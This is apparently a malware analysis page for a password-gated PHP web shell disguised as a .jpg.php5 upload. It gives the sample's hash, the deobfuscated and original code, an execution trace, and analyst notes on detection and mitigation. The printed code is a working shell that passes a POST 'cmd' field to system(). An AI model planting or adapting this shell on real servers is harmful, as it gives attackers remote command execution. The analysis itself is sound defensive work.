PHP Malware Analysis

webfuck.jpg.php5

md5: 4a53e9c3488f8c7ea93c9f1a75b25c91


Screenshot


Attributes

Execution

Input

Title

URLs


Deobfuscated PHP code

<html>
    <head>
        <title> [ d1sx ] </title>
    </head>
    <body bgcolor="black">
        <center>
            <p style="color:#008000">
<?php 
// Analyst note (not part of the sample): access gate for the shell. The only
// check is a loose (==) comparison between the client-supplied "password"
// cookie and a hard-coded string, so that literal doubles as a static
// signature for this file.
if ($_COOKIE['password'] == "haxor1337") {
    echo "shell:<form method=\"POST\"><input type=\"text\" name=\"cmd\" /><input type=\"submit\" /></form><p style=\"color:#008000\">";
    // The POST field "cmd" reaches system() unfiltered: OS command execution
    // with the privileges of the PHP process. system() prints the command
    // output itself and returns the last output line, which is echoed again.
    // Detection: POST bodies carrying a "cmd" field to a script in an upload
    // directory (the trace on this page runs it from one), and the web server
    // process spawning a shell.
    echo system($_POST['cmd']);
    echo "</p>";
} else {
    // No matching cookie: show the password form and an externally hosted
    // image. The image host is a network indicator for this sample.
    echo "password<form method=\"POST\"><input type=\"password\" name=\"pasw\" /><input type=\"submit\" /></form>";
    echo "<img src=\"https://i.im.ge/2022/06/10/rzuzlc.jpg\" alt=\"rzuzlc.jpg\" border=\"0\">";
}
// Login step: a POST field "pasw" equal to the same literal sets the
// "password" cookie to the password itself, in clear text, with no expiry or
// flags passed to setcookie(). Logged or captured requests that carry this
// cookie therefore identify operator sessions.
if ($_POST['pasw'] == "haxor1337") {
    $value = "haxor1337";
    setcookie("password", $value);
}
?>
            </p>
        </center>
    </body>
</html>

/* 
# --{*********}-- #
# author: d1sx    #
# date x/x/2022   #
# --{*********}-- #
*/
<?php 
// Analyst note (not part of the sample): this trailing call sits outside the
// cookie check, so it is reached on every request. Its argument is an array
// holding the bare name cmd, not a request value. In the execution trace on
// this page system() receives [0 => 'cmd'] and returns FALSE, so no command
// appears to have run through this call.
echo system([cmd]);

Execution traces

data/traces/4a53e9c3488f8c7ea93c9f1a75b25c91_trace-1676255194.6092.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 00:27:00.507088]
1	0	1	0.000195	393576
1	3	0	0.000264	397104	{main}	1		/var/www/html/uploads/webfuck.jpg.php5	0	0
2	4	0	0.000316	397480	system	0		/var/www/html/uploads/webfuck.jpg.php5	34	1	[0 => 'cmd']
2	4	1	0.000340	397512
2	4	R			FALSE
1	3	1	0.000356	397104
			0.000381	314264
TRACE END   [2023-02-13 00:27:00.507310]


Generated HTML code

<html><head>
        <title> [ d1sx ] </title>
    </head>
    <body bgcolor="black">
        <center>
            <p style="color:#008000">
password</p><form method="POST"><input type="password" name="pasw"><input type="submit"></form><img src="https://i.im.ge/2022/06/10/rzuzlc.jpg" alt="rzuzlc.jpg" border="0">            <p></p>
        </center>
    


/* 
# --{*********}-- #
# author: d1sx    #
# date x/x/2022   #
# --{*********}-- #
*/
</body></html>

Original PHP code

<html>
    <head>
        <title> [ d1sx ] </title>
    </head>
    <body bgcolor="black">
        <center>
            <p style="color:#008000">
<?php
    // Analyst note (not part of the sample; the md5 on this page was taken
    // over the file without these notes). Triage pointers:
    //  - The file name ends in .jpg.php5. A server that maps .php5 to the PHP
    //    handler will presumably execute it even where an upload filter
    //    accepted it as an image. Mitigation: disable script execution in
    //    upload directories and allowlist on the final extension.
    //  - The hard-coded literal below is both the password and the cookie
    //    value, so it serves as a content signature and a log search term.
    if($_COOKIE['password'] == "haxor1337"){
        echo "shell:<form method=\"POST\"><input type=\"text\" name=\"cmd\" /><input type=\"submit\" /></form><p style=\"color:#008000\">";
        // Command execution sink: the unvalidated POST field "cmd" is passed
        // to system().
        echo system($_POST['cmd']);
        echo "</p>";
    }else{
        // Unauthenticated response: password form plus a remote image.
        echo "password<form method=\"POST\"><input type=\"password\" name=\"pasw\" /><input type=\"submit\" /></form>";
        echo "<img src=\"https://i.im.ge/2022/06/10/rzuzlc.jpg\" alt=\"rzuzlc.jpg\" border=\"0\">";
    }
    
    // A matching "pasw" POST field sets the "password" cookie that the check
    // at the top reads on later requests.
    if($_POST['pasw'] == "haxor1337"){
        $value = "haxor1337";
        setcookie("password", $value);
    }
?>
            </p>
        </center>
    </body>
</html>

/* 
# --{*********}-- #
# author: d1sx    #
# date x/x/2022   #
# --{*********}-- #
*/
<?php /* Analyst note (not part of the sample): reached on every request, with no cookie check; the trace on this page records system() receiving [0 => 'cmd'] and returning FALSE. */ echo system([cmd]); ?>